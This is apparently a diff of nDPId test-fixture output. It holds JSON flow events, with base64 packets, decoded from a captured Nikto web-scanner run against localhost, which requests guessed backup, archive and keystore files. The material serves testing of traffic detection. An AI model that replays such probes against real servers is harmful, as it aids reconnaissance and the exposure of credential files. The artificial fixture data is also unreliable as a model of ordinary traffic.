(Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":242,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277045,"flow_last_seen":1576420277045,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277045,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50028,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":242,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":242,"flow_packet_id":1,"flow_last_seen":1576420277045,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277045,"pkt":"AAAAAAAAAAAAAAAACABFAADCv9RAAEAGfF9\/AAABfwAAAcNsH5AFEofAoVDNroAYAED+tgAAAQEICp1m\/F2dZvxdR0VUIC8xMjcwMDEuemlwIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":242,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277045,"flow_last_seen":1576420277045,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277045,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50028,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":242,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277045,"flow_last_seen":1576420277045,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277045,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50028,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":243,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277046,"flow_last_seen":1576420277046,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277046,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50030,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":243,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":243,"flow_packet_id":1,"flow_last_seen":1576420277046,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277046,"pkt":"AAAAAAAAAAAAAAAACABFAADBTDZAAEAG7\/5\/AAABfwAAAcNuH5C8OnRaQfn7gYAYAED+tQAAAQEICp1m\/F6dZvxeR0VUIC8wLnRhci5iejIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":243,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277046,"flow_last_seen":1576420277046,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277046,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50030,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":243,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277046,"flow_last_seen":1576420277046,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277046,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50030,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":244,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277048,"flow_last_seen":1576420277048,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277048,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50032,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":244,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":244,"flow_packet_id":1,"flow_last_seen":1576420277048,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277048,"pkt":"AAAAAAAAAAAAAAAACABFAADBa4BAAEAG0LR\/AAABfwAAAcNwH5C2s1MRi3VVO4AYAED+tQAAAQEICp1m\/GCdZvxfR0VUIC8wLnRhci5iejIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":244,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277048,"flow_last_seen":1576420277048,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277048,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50032,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":244,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277048,"flow_last_seen":1576420277048,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277048,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50032,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":245,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277049,"flow_last_seen":1576420277049,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277049,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50034,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":245,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":245,"flow_packet_id":1,"flow_last_seen":1576420277049,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420277049,"pkt":"AAAAAAAAAAAAAAAACABFAADEjgBAAEAGrjF\/AAABfwAAAcNyH5D9QLWRKHRYjoAYAED+uAAAAQEICp1m\/GGdZvxhR0VUIC8xMjcuMC50YXIuZ3ogSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":245,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277049,"flow_last_seen":1576420277049,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277049,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50034,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":245,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277049,"flow_last_seen":1576420277049,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277049,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50034,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":246,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277050,"flow_last_seen":1576420277050,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277050,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50036,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":246,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":246,"flow_packet_id":1,"flow_last_seen":1576420277050,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420277050,"pkt":"AAAAAAAAAAAAAAAACABFAADEqilAAEAGkgh\/AAABfwAAAcN0H5AfdZJKMNG2kYAYAED+uAAAAQEICp1m\/GKdZvxiR0VUIC8xMjcuMC50YXIuZ3ogSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":246,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277050,"flow_last_seen":1576420277050,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277050,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50036,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":246,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277050,"flow_last_seen":1576420277050,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277050,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50036,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":247,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277051,"flow_last_seen":1576420277051,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277051,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50038,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":247,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":247,"flow_packet_id":1,"flow_last_seen":1576420277051,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277051,"pkt":"AAAAAAAAAAAAAAAACABFAADFD2RAAEAGLM1\/AAABfwAAAcN2H5CQvDcOP8imdIAYAED+uQAAAQEICp1m\/GOdZvxjR0VUIC8xMjdfMF8wXzEuamtzIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":247,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277051,"flow_last_seen":1576420277051,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277051,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50038,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":247,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277051,"flow_last_seen":1576420277051,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277051,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50038,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":248,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277054,"flow_last_seen":1576420277054,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277054,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50040,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":248,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":248,"flow_packet_id":1,"flow_last_seen":1576420277054,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277054,"pkt":"AAAAAAAAAAAAAAAACABFAADFMyBAAEAGCRF\/AAABfwAAAcN4H5CwJQty\/UTYeoAYAED+uQAAAQEICp1m\/GadZvxmR0VUIC8xMjdfMF8wXzEuamtzIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":248,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277054,"flow_last_seen":1576420277054,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277054,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50040,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":248,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277054,"flow_last_seen":1576420277054,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277054,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50040,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":249,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277055,"flow_last_seen":1576420277055,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277055,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50042,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":249,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":249,"flow_packet_id":1,"flow_last_seen":1576420277055,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277055,"pkt":"AAAAAAAAAAAAAAAACABFAADBVOZAAEAG505\/AAABfwAAAcN6H5D0fGyVu01Ol4AYAED+tQAAAQEICp1m\/GedZvxnR0VUIC8xMjcuMC5lZ2cgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":249,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277055,"flow_last_seen":1576420277055,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277055,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50042,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 